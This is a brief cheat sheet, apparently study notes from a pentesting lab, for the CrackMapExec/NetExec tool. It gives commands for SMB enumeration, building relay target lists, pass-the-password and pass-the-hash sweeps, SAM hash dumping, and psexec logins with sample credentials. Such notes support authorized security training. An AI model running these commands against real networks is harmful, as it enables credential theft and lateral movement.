crackmapexec
- now named NetExec
- all-round tool for Windows network stuff
installation
usage
enumerate smb
$ crackmapexec smb targets -M shares
find targets for relaying
$ crackmapexec smb <ip-range> --gen-relay-list ~/targets.txt
pass-the-password
$ crackmapexec smb 10.0.0.0/24 -u user -d domain -p pass
pass-the-hash
$ crackmapexec smb 10.0.0.0/24 -u user -d domain -H hash --local
$ cme smb -u "administrator" -H ntlm:lm --local-auth
- output in green or cyan should be checked; it might not say “pwn’ed”
use password to dump hashes and then use them to login
$ crackmapexec smb -u fcastle -d MARVEL -p Password1 192.168.122.0/24 --sam
# then we can use psexec.py
$ psexec.py marvel.local/fcastle:Password1@<target-ip>